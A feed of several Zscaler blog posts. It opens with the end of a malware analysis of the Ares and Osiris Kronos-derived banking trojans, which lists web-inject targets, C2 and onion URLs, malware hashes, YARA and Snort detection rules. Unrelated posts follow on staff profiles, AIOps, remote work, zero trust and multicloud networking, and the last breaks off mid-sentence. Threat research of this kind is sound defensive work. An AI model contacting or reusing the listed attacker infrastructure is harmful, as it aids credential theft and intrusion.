set_url https://** GPI
set_url https://** GPI
set_url https://** GPI
set_url https://** GPI

When a victim browses to a website that matches one of these patterns, JavaScript code will be injected from the threat actor's domain https://securebankingapp[.]com/. The full list of web injects for this Osiris instance is shown here. The threat actor has another active Osiris C2 server located at http://qqkzfkax24p4elax[.]onion/kpanel/connect.php. This C2 server is also serving commands to exfiltrate credentials, but the web inject configuration file is blank. However, the C2 server is also providing commands to extract a victim's email contact list using Nirsoft's OutlookAddressBookView, which is downloaded from the following locations:

http://qqkzfkax24p4elax[.]onion/kpanel/upload/oabv32.exe (32-bit)
http://qqkzfkax24p4elax[.]onion/kpanel/upload/oabv64.exe (64-bit)

Conclusion

Ares is a new fork of the Kronos banking trojan that appears to be in the early stages of development. The code contains several bugs and unreferenced code segments that are likely used for debugging purposes. The threat actor has invested significant resources in building DarkCrypter, BMPack, Ares, and Ares Stealer. Therefore, activity related to this threat is likely to increase as the malware continues to mature.
Detections

Zscaler's multilayered cloud security platform detects indicators at various levels, as shown below:

Win32.Banker.Kronos
Win32.Banker.Kronos.LZ

MITRE ATT&CK Table

Tactic / Technique
T0011 - Command and Control
T1053 - Scheduled Task/Job
T1078 - Valid Accounts
T1087 - Account Discovery
T1090 - Proxy
T1185 - Man in the Browser
T1219 - Remote Access Software
T1497 - Virtualization/Sandbox Evasion
T1552 - Unsecured Credentials
T1573 - Encrypted Channel
T1592 - Gather Victim Host Information

Indicators of Compromise (IOCs)

The following IOCs can be used to detect Osiris and Ares infections.

Samples (SHA256 hash - module name)
da767e6faf97d73997f397eae71b372a549dd6331bf8ec0ebd398ef8cfe9a47e - Osiris sample
5e7642e945bd05ecea77921cb3464b6da8db59e5ff38240608e3cbb44b07fb1d - Osiris sample
7498e37c332d55c14247ae4b675e726336a8683900d8fd1da412905567d2de4a - Ares sample
e5d624b7060c0e885abe11a0973a43a355c9930fc6912ff5eac83d1a9eec9c29 - Ares sample
035793d479c4229693fc6dcceaa639cd51ae89334b43e552b9c47a6dea68ce30 - Ares sample with embedded Startup module
94b084ea925990742f4eaaada1eef9a42c13066bf4f4c7a3b12a1509e32ff9e6 - Ares Stealer sample
09897c6ef88b9e9bc20917a2b47ec86ff2b727a2923678f5e2df6bb6437d3312 - Ares VNC plugin
896cebf465257f60347e58ffd7ec61629cf530956ef9b00e94f8b40ef9b30581 - DarkCrypter with second-stage BMPack and Osiris sample
956ae36f40d0d847daa00d7964906e7e9d1671d0f3f2e7d257d5a8d324388c31 - DarkCrypter sample with encrypted Ares payload
6c5dac9043b2f112543f3eca6503d4bcc70d762b47d75dcb85f9767c603de56f - DarkCrypter sample with compressed Ares TOR payload
b3348405cd0fa66661b46bc6cbab97b55708be26a2ed7a745e1632b46d1b3f41 - DarkCrypter sample with encrypted Ares payload
4044abad9a846e203f131c65b1f84bb2b79f94000d1d7be6c6d6a8e27ac76940 - BMPack sample with Osiris payload

Network Indicators (domain / IP address - description)
http://ylnfkeznzg7o4xjf[.]onion/kpanel/connect.php - Osiris C2 URL
http://m3r7ifpzkdix4rf5[.]onion/kpanel/connect.php - Osiris C2 URL
http://qqkzfkax24p4elax[.]onion/kpanel/connect.php - Osiris C2 URL
https://securebankingapp[.]com - Osiris web inject domain
http://vbyrduc537l5po3w[.]onion/panel/connect.php - Ares C2 URL
http://wifoweijijfoiwjweoi[.]xyz/panel/connect.php - Ares C2 URL
http://ddkiiqefmiir[.]xyz/panel/connect.php - Ares C2 URL
http://ddkiilefmjim[.]xyz/panel/connect.php - Ares C2 URL
http://ddkiieeelkif[.]xyz/panel/connect.php - Ares C2 URL
http://ddkiiofelkkq[.]xyz/panel/connect.php - Ares C2 URL
http://ddkiihfelikh[.]xyz/panel/connect.php - Ares C2 URL
http://ddkiiffdkijh[.]xyz/panel/connect.php - Ares C2 URL
http://ddkiigedliji[.]xyz/panel/connect.php - Ares C2 URL
http://ddkiirfdmjks[.]xyz/panel/connect.php - Ares C2 URL
http://ddkiitefkkju[.]xyz/panel/connect.php - Ares C2 URL
http://mydynamite.dynv6[.]net/panel/connect.php - Ares C2 URL
http://cabletv[.]top/panel/connect.php - Ares C2 URL

Yara rules

These rules are valid on unpacked Kronos, Osiris, and Ares binaries.

rule kronos_string_decryption
{
    strings:
        $ = {6a 1e 5f f7 f7 8b 45 08 8d 3c 1e 8a 04 38 8a ?? ?? ?? ?? ?? 32 c2}
        $ = {55 8b ec 51 8b 4d 08 c1 e1 04 8b ?? ?? ?? ?? ??
8a}
    condition:
        all of them
}

rule kronos_api_strings
{
    strings:
        $ = "D7T1H5F0F5A4C6S3"
        $ = "H2G3F4F0F5A4D5E6"
        $ = "X1U5U8H8F5A4C8C5"
        $ = "E3D7R6B3R4H5F3R7"
        $ = "X8D3U3P7S6Q3S5R1"
        $ = "X8D3T6Q6U3S3A6R1"
        $ = "R6G2D2R3A5E3C4U5"
        $ = "H7Y6G2R3A5F4D3S8"
        $ = "P7Y3Q5P0Y8C2Y6F6"
        $ = "R6Y7B3C6E7E6T7U7"
        $ = "G2F3G6A6R3F1P6G2"
        $ = "S3H8T8Y5F5B5B0X0"
        $ = "C8G2T3U3B1H3T5B5"
        $ = "C4R7A2P4X3B1H5A4"
        $ = "R3Q7T7Q2R6S1Y3R5"
        $ = "E3C3A2Y3C4U6S5F5"
        $ = "F3P7Y6P3U3E2U5F3"
        $ = "E5X0A4Q4F0Y0D6E2"
        $ = "X2R0A4Q4F0Y0D6F3"
        $ = "H1G7R4Y7D1E6R5F8"
        $ = "G3C3R4H7R5T8E5R8"
        $ = "F6H5P7T4F6D6Y6D4"
        $ = "E3C7U2Y3C3R6R5D5"
        $ = "F5E8X5G3Q6T7E6T3"
        $ = "E1U3D5F7R2Y5S0H4"
        $ = "H3Y5C8Y2D4U8Y4S3"
        $ = "U0U6H1T2F6S1P2Y5"
        $ = "D5R3T8D5D3H0B4E2"
        $ = "D5B6G6R4A6H1P7A3"
        $ = "F1Q3D0H4H3T6U1X5"
        $ = "A4T6P1G7D6G0F3S5"
        $ = "C7G5T6P7U5B1H0F5"
        $ = "X2C7E3U6F3A7Y1D5"
        $ = "P4Y7T7R7R8X3E3A3"
        $ = "C5Y7R2R2H1R7A1B2"
        $ = "S4A3E3S3S4T1T3D1"
        $ = "B4Y2H7F8A2T3G4H3"
        $ = "B5D6X4H5G6S3R2B5"
        $ = "B6F6X4A8R5D3A7C6"
        $ = "C6P7E6P7A1R5Q4R7"
        $ = "R8S7D7S8H6Y4T6B7"
        $ = "U0S3T3D3U5F5B4E8"
        $ = "F6C3U4P4X3B1H3T5"
        $ = "T2F2T3U2H5B1C1A7"
        $ = "T0E0H4U0X3A3D4D8"
        $ = "C5R4X4H7R5T7A5R6"
        $ = "D3S0A7R4F6C8F2R5"
        $ = "Y1C1B6A7H3C0E7E7"
        $ = "H2E7A5B8Q6G3S7Y3"
        $ = "D3Q5F2F3R5Y5Y8S2"
        $ = "Y2C3G8R5R3A5F5B4"
        $ = "F1D2B6A5T3X2C8R1"
        $ = "G5D3P2G0F6G2H8E6"
        $ = "Y6Q6P2G0E5E6G2H8"
        $ = "Y7D3F3S7X2S4F2X3"
        $ = "X7D0E3R2R4Q0E4D3"
    condition:
        25 of them
}

Snort rules

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Zscaler TROJAN Ares Command Beacon"; flow:established,to_server; content:"POST"; http_method; content:"/connect.php?a="; http_uri; classtype:trojan-activity; rev:1;)

Tue, 30 Mar 2021 11:09:11 -0700 Brett Stone-Gross

Celebrating Women at Zscaler: Melissa Balentine on Professional Growth and the Evolution of Zscaler

In honor of Women's History Month and International Women's Day on March 8, we're recognizing influential and powerful women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole.
Melissa Balentine, Senior Vice President of Finance, has been with Zscaler for more than five years. In that time, she's seen Zscaler grow and go public, and she has honed her professional skills to make a difference and find fulfillment within the company.

Q: What are you most proud of in your career?

A: Going through the IPO process at Zscaler, and the ultimate public offering, was one of the most important projects in my career. Having built internal reporting to support being a public company, I got the opportunity to see firsthand how this information is shared and used by the outside analysts who would eventually value Zscaler. Having all of this preparation leading up to the day we listed the stock, and to be in NYC for the big event, was exhilarating.

Q: What is one of the most valuable skills that helped you get to the role you have today?

A: Executive presence. As I've grown in my career, the ability to project confidence through effective communication and presentation skills has become more critical. I work to "read the room" when I host meetings to be sure my message is understood. Additionally, one of the most valuable skills I have honed is complex financial modeling. I spend time researching modeling inputs and understanding their relative impact on the financial results of the company. The models I build can be very large and cumbersome. What I've learned is that building the model is only half of the work; the other half is taking the result and simplifying the message so it can be easily understood and explained. It isn't necessary to show all of the steps and analysis, but instead to draw clear, concise conclusions that allow executives to digest and act. This step takes as much effort as building the model itself and is equally important. With this skill, I have the tools not only to prove out certain trends and theories through financial modeling, but also to enable key decision-making based on the modeling results.
Q: What do you like to do outside of work?

A: I like to unwind by working out, from my early morning workouts on my Stairmaster to local hikes on weekends. I also enjoy reading, mostly historical fiction. Since the shelter-in-place orders, I have enjoyed watching home renovation shows.

For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women's Day. Further reading: Celebrating Women at Zscaler: How Jey Govindan Empowers Future Generations of Women in Tech Celebrating Women at Zscaler: Sandi Lurie and Karen Mayerik

Tue, 16 Mar 2021 08:00:02 -0700 Kristi Myllenbeck

Zscaler AIOps: Drawing the Signal Out of the Noise in the Largest Security Cloud

This post also appeared on LinkedIn. The Zscaler Zero Trust Exchange, the cloud platform that powers all Zscaler services, secures more than 150 billion transactions per day, protecting thousands of customers from cyberattacks and data loss. The Zscaler platform is the world's largest inline security cloud, and the sheer volume of data it processes is astronomical: every second, another 1.6 million transactions move securely through the platform, and in that one second, it blocks up to two thousand new threats. The Zscaler Zero Trust Exchange produces mountains of data. For a relative sense of that scale, here are some comparable stats from other cloud platforms: Figure 1. Comparing Zscaler data traffic to other cloud platforms. Each dot represents 100 million data points. (Sources: Facebook, Google, Zscaler.) Finding meaning in all of that data is the shared responsibility of Zscaler's engineering, research, and machine learning (ML) teams. I have the privilege of leading the ML group: we're tasked with staying ahead of advanced threats, and with identifying and blocking threats before they become measurable risks.
We comb through the mountains of Zscaler cloud data to identify threat patterns and block advanced (and often previously unknown) threats without signatures or human interaction. The ML team's work extends beyond protecting Zscaler customers' data traffic. The ML group collaborates with Zscaler big data, cloud reliability, TAM, and support teams to explore how to make worldwide cloud operations smoother, using ML to craft actionable operational strategies based on our own operational data. We work closely with Zscaler's operations and reliability teams: they employ a diverse set of tools and automation processes to maintain and monitor the Zscaler Zero Trust Exchange's highly scalable cloud infrastructure. Monitoring such a massive, large-scale cloud is not a trivial exercise, and it comes with challenges. For example, the Zscaler cloud infrastructure must interact with some external networks, and performance or reliability issues (say, those related to an ISP problem) often occur before data reaches the Zscaler cloud. There is also the challenge of interpreting a massive volume of metrics, and AIOps can help find higher-level patterns. As part of our ongoing analysis, the ML team examines numerous metrics, including (but not limited to) volume, latency, and traffic destination/direction. We leverage multiple ML models to find meaning in the performance data. Anomaly detection for each metric can give us a single "dot" of alert, an individual data point that by itself can be noisy and unclear. But the more anomaly-detection dots we collect from other metrics, the more vivid the picture we can paint: our AI models correlate and (literally) connect the dots to draw the signal out of the noise. We recently introduced new AIOps ML models and quickly discovered how effective they could be when put into practice. In January, a Zscaler customer's tunnels "flipped" at one of our data centers in Hong Kong.
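The "connect the dots" idea can be sketched in miniature (a toy illustration, simplified far beyond any production model): flag per-metric anomalies with a z-score, then alert only where several metrics are anomalous in the same window. The metric names and values below are invented for the example.

```python
from statistics import mean, stdev

def anomaly_dots(series, threshold=2.0):
    """Flag points more than `threshold` sample standard deviations from the mean."""
    mu, sigma = mean(series), stdev(series)
    return [(abs(x - mu) / sigma > threshold) if sigma else False for x in series]

def correlated_alerts(metrics, min_dots=2):
    """Raise an alert only where at least `min_dots` metrics are anomalous at once."""
    dots = [anomaly_dots(series) for series in metrics.values()]
    return [sum(col) >= min_dots for col in zip(*dots)]

metrics = {
    "volume":  [100, 102, 99, 101, 100, 400, 100, 101],
    "latency": [20, 21, 19, 20, 22, 90, 20, 21],
    "flips":   [1, 0, 1, 2, 1, 1, 0, 1],
}
alerts = correlated_alerts(metrics)  # only the coordinated spike at index 5 alerts
```

A single noisy metric (like the small bump in "flips") never fires on its own; only the window where volume and latency spike together produces an alert, which is the spirit of the correlation described above.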
The flipping tunnels had no impact on customer performance, since that customer had followed Zscaler configuration best practices and established redundant tunnels. But the problem could have reflected a more significant issue. Figure 2. ZTE "flow" flipping analysis. Figure 2 above shows the number of companies with flipping "flows." The "flow" is a conceptual construct: like a tunnel, but more granular than a standard GRE/IPsec tunnel. Picking up that spike is not as simple as it might look on the surface: assessing the flow requires interpreting a massive amount of data. Where do we draw the line to set a threshold alert? The top spike? The top 10? The top 20? How should we balance a high detection rate against high accuracy? And how do we establish a threshold for a specific data center? Are there other metrics we should leverage together? Answering these questions requires statistical and ML baselining and modeling. In the event, our AIOps ML testing model instantly picked up the real-world alert, enabling us to isolate and address the problem immediately. The real problem we saw in the Hong Kong data center was occurring upstream of Zscaler, and it was resolved after communication with the "mid-stream" ISP. Even without the AIOps model, Zscaler operations folks would have discovered the problem, but the name of the game is turnaround time. Had our model been officially live at the time, we would have discovered (and then resolved) the issue even faster. In this example, we were able to identify and then resolve a problem at a customer's ISP before it impacted performance. We did it by finding a signal in the massive amount of data and metrics the Zscaler Ops team produces, and by leveraging the domain expertise we have within the company. Here at Zscaler, we are only just beginning our journey of applying AI and ML to customer cloud transformations. The future of AIOps, especially at Zscaler, is exciting, and it enables us to serve customers better and faster.
Mon, 15 Mar 2021 10:26:56 -0700 Howie Xu

Key Takeaways From a Year of Remote Work

It's a Monday morning in January. Heavy snowstorms are moving across Germany, leading to traffic chaos on the roads and in the air. My first thought when I opened my eyes was, "Nice, you don't have to race to the airport, potentially get into a traffic jam on icy roads, and rush through security to catch a flight to a business meeting in Hamburg, London, or Prague, only to find that the flight was cancelled due to the weather conditions." Since mid-March 2020, our everyday working routine has changed considerably. Negativity aside, many of us simply have a different day-to-day now. Today, not only can I sleep a bit longer, but I can also start my day with my new routine of doing sports, and getting a healthy breakfast and my favourite coffee from my own espresso machine, while still arriving on time at my laptop for my first meeting, without having travelled a single mile (except for walking from the kitchen into my home office). This is what I consider to be a luxury in my new normal way of working. Working for Zscaler enables me to work totally remotely, in line with the contact regulations required by the pandemic, and still be productive. Because I no longer have to invest time travelling to customer headquarters, I can even fit in more remote meetings per day than I could with in-person meetings. Moreover, working remotely was always part of my employment contract, as Zscaler's technology enables me to work from wherever I want. Nevertheless, a huge percentage of my working life used to be filled with meetings across European cities and nights in hotel rooms, in order to be on time for early morning workshops on infrastructure and security requirements for the future way of working.
Before COVID-19 hit, I was travelling at least four out of five workdays to attend in-person meetings with customers and prospects, consulting them on their digital transformation strategies. Miles were piling up on my Lufthansa frequent flyer card and my car's odometer, not to mention the heavy use of my Bahncard. Looking back at the first year of working constantly from home, I've come up with a positive balance in many areas. Before the lockdown, approximately 284 days of the year would have started with a stressful early morning routine. Working from home saved me about 24,750 kilometres on motorways and 195,000 air miles. I even had the time to dive deeper into this calculation: the amount of carbon dioxide that this travel workload would have created is equal to 41.58 tons ...just produced by me, myself, and I. The last year was record-breaking in many ways, but I want to take a moment to emphasize these staggering environmental statistics. My normal working habits in my on-the-road role were causing an average of 41 tons of CO2 per year. Just as a reference, the average German resident produces something around 7.9 tons. Besides the stress and the amount of money that travelling eats up, I was astonished by this high number. Every single kilometre in my car produces 102g of CO2, and each air mile by plane produces 200g. Of course, it would be possible to optimize these numbers, for example by replacing my diesel with an electric car (which would emit 62g per km instead, already a marginal gain), or I could try to reach my destinations more often by train and accept longer travel times. All in all, my personal carbon footprint would still be high. The real change was forced on me by the pandemic, which replaced face-to-face meetings with online interactions with colleagues, partners, prospects, and customers.
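For the curious, the back-of-the-envelope arithmetic behind those figures checks out (taking the stated per-kilometre and per-mile emissions as given, with a little rounding in the totals):

```python
# Figures from the text: 24,750 km by car at 102 g CO2 per km,
# and 195,000 air miles at 200 g CO2 per mile.
car_tons = 24_750 * 102 / 1_000_000   # roughly 2.52 t from driving
air_tons = 195_000 * 200 / 1_000_000  # 39.0 t from flying
total = car_tons + air_tons           # roughly 41.5 t, in line with the ~41.58 t above

# The electric-car alternative at 62 g per km:
ev_tons = 24_750 * 62 / 1_000_000     # roughly 1.53 t, a saving of only about 1 t
```

The flying dominates: even swapping the diesel for an electric car barely dents the total, which is exactly the "marginal gain" noted above.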
Looking at my individual contribution to air pollution, I can only endorse the efforts of various green organisations to reduce travel in favour of working from home. Greenpeace has called for a set number of work-from-home days each week. The organisation has found that at least a third of the German workforce (25-37%) has been working from home since the first phase of the German lockdown in mid-April 2020. The Work from Anywhere Trends Dashboard from Zscaler replicates these findings: the amount of remote user traffic has risen steadily since the first lockdown, showing that companies have gradually adopted the new work-from-anywhere paradigm. For reference, making a permanent habit of working remotely one or two days per week would save up to 5.4 million tonnes of CO2 in Germany. Personally, I strongly believe that being able to work from home is one of the positive side effects of the dark times resulting from the global health crisis. However, I come across a lot of different opinions, and offices are still full of employees (not only in industries where remote working is not feasible). I was curious to understand the reasons behind these different habits of continuing to work from corporate offices. Beyond technological reasons, like missing infrastructure to enable efficient and secure remote access, other factors prevent people from working from home. Not being able to structure a working day while working from home is just one of the arguments I've heard, to say nothing of families who have to share limited space in a household with kids, juggling a job with monitoring homeschooling efforts while also keeping children happy and motivated. Not infrequently, it was the employer that demanded work from office spaces, as there still seems to be a certain reluctance to trust the productivity of remote workers. 
Experience proves these sceptics wrong, as best-practice examples from Zscaler customers show (Working from Home: Greater Efficiency brings productivity). Given the right technology infrastructure for fast and reliable remote access, staff are just as productive working from home, if not more so, since some of the typical office distractions are reduced. Some early adopters have embraced the work-from-anywhere mentality wholeheartedly and don't regret it. My daily online conferences show the differences, reflecting which companies have adapted fast and are able to keep their workforce and business productive. My personal takeaways from this "new normal" are that you have to adapt to get the most out of your daily online meetings. Virtual interactions require as much preparation time, if not more, to live up to the expectations of a group of meeting participants. You can't have a face-to-face chat during a coffee break or at the bar in the evening to make sure you have brought your point across. You need to follow up with more phone conversations or meetings and invest more time to reach a mutual understanding for a project's success. I've also found that it is super important to take motivation from small successes, as we all miss the bigger events to look forward to, like our next big adventure in a foreign country. The last year has shown that this way of doing business is feasible. I, for one, have grown to be an expert timekeeper, learned how to separate working hours from leisure time, and don't want to give up the newly won freedom of time I no longer spend travelling. Even if it might still take some time to convince the remaining sceptics, the year of lockdown has catapulted many organisations into the future way of working today. 
We have grown accustomed to video conferencing, and once contact restrictions are loosened, we will have to keep the habit of making an educated decision about when in-person contact is the preferred option for a meeting. So the question has to be: what did we learn in the last year that is here to stay? I personally have made up my mind already. I'll keep a closer eye on my carbon footprint moving forward. The environment will benefit from it. Mon, 15 Mar 2021 01:00:02 -0700 Kevin Schwarz Bringing Zero Trust Into Focus In the latest of the seemingly endless string of IoT security incidents, Verkada, a video security startup that boasts a real-time, accessible-from-anywhere management console, was recently breached. This incident exposed live and saved video feeds from over 149,000 security cameras in use within office buildings, schools, and consumers' homes, counting larger businesses such as Tesla and Cloudflare among the victims. In this breach, an administrator's password was published to the internet, allowing hackers to log in with privileged access to the full platform and customer files. The ThreatLabZ research team regularly monitors IoT threats among the 150+ billion Zscaler platform transactions that occur daily, and listed IP and network cameras among the top unauthorized devices in use on corporate networks in its 2020 IoT Devices in the Enterprise report. Typically, the threat posed by IoT cameras is that the devices themselves are easy to hack, providing attackers access to corporate networks as employees check their nanny cams from work or engage in similar activities. These types of exploits pop up regularly, such as the RIFT botnet, which looks for vulnerabilities in network cameras, IP cameras, DVRs, and home routers. 
This latest breach, however, represents a different type of security concern that is not exclusive to IoT devices (and certainly not exclusive to Verkada): vendors in your environment who may be storing data with inadequate protections. As a security practitioner, you must be aware of the security protocols in place for all of the sensitive data in your ecosystem, whether you manage it yourself or a vendor manages it on your behalf. Failing to do so is like having someone in your pandemic bubble whose behaviors you have no visibility into: you hope they aren't going to raves every weekend, but you have no way to really know whether you're safe. There are a few takeaways we can learn from incidents like the Verkada breach: Get serious about zero trust. First, it should not be easy for "super admins" to access all of your sensitive data, especially customer data, and if such access is required, it must be locked down behind several layers of authentication. A foundational principle of zero trust policy is the requirement that you restrict access to the minimum required to get a job done, with heavy monitoring and authentication all along the way. Access policy gates every transaction in the Zero Trust Exchange, the platform that powers all Zscaler services. Segment your applications, and get your data off the internet. The backend of your systems should never be exposed to the internet, where a hacker can even attempt to log in. Putting your servers behind a proxy means that hackers can't even see that the servers exist, and all authorized access requires layers of authentication in full view of your security teams and their analytics tools. Additionally, by segmenting applications, you limit the damage threat actors can cause in the event that they successfully breach one application; they can go no further. Manage your cloud security posture. 
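The least-privilege idea in the first takeaway can be pictured with a toy policy check. This is a hypothetical sketch, not Zscaler's implementation or API: the `Request` fields, the `POLICY` table, and the `allow` function are all invented for illustration, but they capture the default-deny, per-application shape of a zero trust access decision:

```python
# Hypothetical zero trust access decision: every request is evaluated
# against user identity, device posture, and a per-application policy.
from dataclasses import dataclass

@dataclass
class Request:
    user: str
    roles: set
    device_compliant: bool
    mfa_passed: bool
    app: str

# Policy maps each application to the roles allowed to reach it.
# An app absent from the table is unreachable: default deny.
POLICY = {
    "payroll":   {"finance"},
    "crm":       {"sales", "support"},
    "admin-api": {"super-admin"},
}

def allow(req: Request) -> bool:
    """Grant access only if every condition holds; anything else is denied."""
    allowed_roles = POLICY.get(req.app, set())
    return (
        req.mfa_passed                       # authenticated with MFA
        and req.device_compliant             # device posture is healthy
        and bool(req.roles & allowed_roles)  # role is scoped to this app
    )

print(allow(Request("ana", {"finance"}, True, True, "payroll")))    # True
print(allow(Request("ana", {"finance"}, True, True, "admin-api")))  # False
```

Note that even an administrative role only reaches the applications the policy explicitly scopes it to, and a non-compliant or unauthenticated device is refused regardless of role, which is exactly the property the Verkada incident lacked.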
The cloud applications and data storage locations you and your partners are using must be configured correctly. Making sure that they are is easy with the right tools: use cloud security posture management (CSPM) to scan your environments for misconfigurations, compliance violations, and other issues that make you vulnerable. Every breach story is another reason to take steps forward in your journey to comprehensive zero trust. To learn more about IoT security trends and best practices, check out the ThreatLabZ report, 2020 IoT in the Enterprise: Shadow IoT Emerges. Fri, 12 Mar 2021 10:48:50 -0800 Mark Brozek The Growing Importance of Multicloud Networking For many organizations, cloud migration has resulted in an unprecedented transformation in computing, dramatically improving agility, automation, scalability, and performance. Unfortunately, the same can’t be said of connectivity. Cloud connectivity is largely based on decades-old technologies that have only incrementally improved over time, saddling enterprises with static, complex solutions for connecting their completely modernized compute infrastructure. Why is this the case? Traditional networking vendors, who have been outfitting data center connectivity for years, are plagued by their own success and inertia. When you have a cash cow product line that has worked for years, it’s amazingly difficult to scrap it and start with a blank slate based on updated market requirements. The cloud service providers would be the next logical step, but even they have their own business-driven rationale for not closing this gap. Why would they build simple, secure connectivity solutions that encourage their customers to adopt a hybrid-cloud or multi-cloud approach when so much of their business model relies on single-cloud consolidation? Multicloud networking with legacy technologies As we’ve seen, even building secure internet access for cloud workloads can be a challenge. 
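What a CSPM scan does can be illustrated with a toy rule set. The resource list and checks below are hypothetical, reflecting no particular cloud provider's schema or any real tool's rule engine, but the pattern is the same: evaluate each resource's configuration against codified rules and report every violation:

```python
# Toy CSPM-style scan: flag risky settings in resource configurations.
# The resources and rules here are invented for illustration only.
buckets = [
    {"name": "public-assets", "public_read": True,  "encrypted": True},
    {"name": "customer-data", "public_read": True,  "encrypted": False},
    {"name": "backups",       "public_read": False, "encrypted": True},
]

def findings(resources):
    """Return (resource name, issue) pairs for every rule violation."""
    issues = []
    for b in resources:
        if b["public_read"]:
            issues.append((b["name"], "bucket is publicly readable"))
        if not b["encrypted"]:
            issues.append((b["name"], "encryption at rest disabled"))
    return issues

for name, issue in findings(buckets):
    print(f"{name}: {issue}")
```

Real CSPM tools run hundreds of such rules continuously against live cloud APIs and map findings to compliance frameworks, but the value proposition is the same: a misconfigured bucket is caught by a scan before an attacker finds it.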
Stitching together secure connectivity across multiple clouds and your data centers means the challenge grows severalfold, requiring a patchwork of site-to-site VPNs, firewalls, transit gateways, peering policies, and more. What's worse, since the configuration of all of these assets is based on network-layer port and IP ACLs, the policies must constantly be updated to keep pace with the dynamic nature of cloud workloads. The impact? Either someone spends all day (every day) updating policies, or your developers need to wait for networking and security teams to get around to it. Neither of these is a palatable option! The whole process is complex, slow, and costly, and results in a situation where nobody is happy. The rise of modern multicloud networking Fortunately, as needs arise, the vendor community often responds with innovative new solutions. Zscaler is at the forefront of solving these multicloud networking challenges with workload communications via Zscaler Cloud Connector. Zscaler Cloud Connector simplifies and automates the process of securely connecting cloud and data center workloads to each other and to the internet. Built on Zscaler's proven Zero Trust Exchange platform, the solution eliminates the cost, complexity, and hassle of connecting cloud workloads using legacy technologies. Zero-touch deployment and automated policy configuration through deep integration with native cloud services and automation tools mean that Cloud Connector can be auto-deployed across multiple clouds in minutes. And because it's built on zero trust, your attack surface is minimized, dramatically reducing the risk of a data breach. If any of the challenges in this post sound familiar, it's time to take a look at workload communications made possible through Zscaler Cloud Connector. Reach out today to schedule a demo. 
Wed, 10 Mar 2021 13:42:24 -0800 Rich Campagna Celebrating Women at Zscaler: Diana Vikutan on Developing Zscaler and Honing Multitasking Skills During Quarantine In honor of Women's History Month and International Women's Day on March 8, we're recognizing influential and powerful women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Diana Vikutan, Director of Cloud Operations at Zscaler, manages a team of Program and Project Managers and was the first Program Manager at Zscaler when she joined six years ago. Diana and her team oversee platform and private infrastructure programs as well as cross-functional and internal CloudOps projects. "I'm so proud to be a part of Zscaler's success and growth story and part of the great team that helped to move a promising private company to a global player and an industry leader in the cybersecurity space," she said. Q: What advice do you have for women wanting to get into tech? A: Just do it! Take that first step, whether it's getting a technical degree, completing that training course, or landing a first job. You have to make an initial effort, no matter how small it seems at the time, in order to see results in the future. Without trying, you would never know what you are capable of. If I could give my younger self any professional advice, it would be to not be afraid to take risks! Q: Who was your greatest inspiration when you were growing up and why? A: I've never considered a particular person as my inspiration. I've always preferred to set my own goals. At the end of the day, you can only be successful when you don't compare yourself to others but compete with yourself instead. Q: Have you picked up a hobby during quarantine? A: During quarantine, I've definitely taken my multitasking skills to the next level as a working mother of a toddler! 
For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: How Jey Govindan Empowers Future Generations of Women in Tech Celebrating Women at Zscaler: Sandi Lurie and Karen Mayerik Thu, 11 Mar 2021 08:00:01 -0800 Kristi Myllenbeck Celebrating Women at Zscaler: Sandi Lurie and Karen Mayerik In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Karen Mayerik Karen Mayerik is a Sales Engineering Manager for customers that are in education and state and local governments. “If you love problem-solving, tech is an amazing place to be,” she said. “I get a lot of satisfaction from meeting with customers, understanding where they're having challenges, and being able to solve those problems for them. There's something that is really creative as part of that process.” Outside of work, Karen enjoys spending time with her husband and two daughters, ages 10 and 12. “We love to go to the lake as a family,” she said. “And we actually have a rule that when we're on the boat or around the campfire, we put all of our devices away, so it's always a nice break!” Sandi Lurie Sandi Lurie has been Vice President, Talent Acquisition at Zscaler since July 2020. “Our job is to attract and hire top talent into the company while maintaining an exceptionally high bar for candidate experience,” she said. “Watching the careers of people that I've worked with and hired in my past companies is extremely rewarding. 
Whether it's people leaving the talent acquisition career path to move into HR business partner or operational roles, or people I hired into their first job now running talent teams at scaling companies themselves, I love seeing people succeed.” Outside of work, in non-quarantine times, Sandi loves to travel, attend live theater shows in New York, and spend time with friends and family. During quarantine, however, she has been mastering eyelashes and the art of banana bread baking. To learn more about the powerful women at Zscaler and how we're celebrating throughout the month, read our International Women's Day blog. Further reading: Celebrating Women at Zscaler: How Jey Govindan Empowers Future Generations of Women in Tech Wed, 10 Mar 2021 08:00:01 -0800 Kristi Myllenbeck How a Blizzard Froze the Network (and Prepared an IT Team for 2020) This post originally appeared on LinkedIn. A blizzard helped a fellow CISO understand a better way to do IT security and, in the process, prepared his organization for an even greater crisis a few years later. I was talking with one of my CISO peers about adapting to various crises, natural disasters in particular, and he relayed the following story to me. Early in his CISO career, he deployed company-wide security. The plan was straightforward, or so he thought: Build a single, centralized security control architecture. All traffic (local, branch office, remote user) would get routed through the "castle-and-moat" design, examined and inspected, then sent where it needed to go. Centralized security controls promised a unified way for his security teams to keep threats at bay. It made sense strategically and financially: Replicating security at different locations would have multiplied the effort, the equipment, and the cost. Early success was a ray of sunshine His plan met with early success: his team's security blocked a virulent malware attack and they all patted themselves on the back for a job well done. 
They had made the right decision! But his sunny centralization journey was just the calm before the storm. Their castle-and-moat security architecture routed all traffic from everywhere, including traffic bound for the internet, through their security stack. Security became a huge bottleneck. Users couldn't access simple things like social media. Media applications such as YouTube slowed to a crawl. Important productivity applications became unusable. The user experience degraded below an acceptable threshold, and people found new ways to use apps and services, ways that bypassed centralized security. The more protection the team put in place, the more latency was introduced, and the more people started using other channels to get online: home networks, mobile connections, or public Wi-Fi. Employees avoided security by using unsecured links and unapproved proxies. Now the company's network was less secure, and its highly prized (and highly expensive) security system was failing under the weight of the side effects caused by its intended use. In response, my CISO colleague was forced to do what he had tried to avoid: His security teams created three new data centers and cloned "centralized" security in each. In theory, this allowed people to get better performance by providing localized access, splitting one big, bottlenecked traffic load into three smaller distributed loads. It also tripled the cost, management, and complexity of their security footprint, but they could justify it with the hope of improved user experience. Even with these new breakouts, the users still avoided security controls. Employees were used to accessing applications and services however they liked and were understandably reluctant to go back 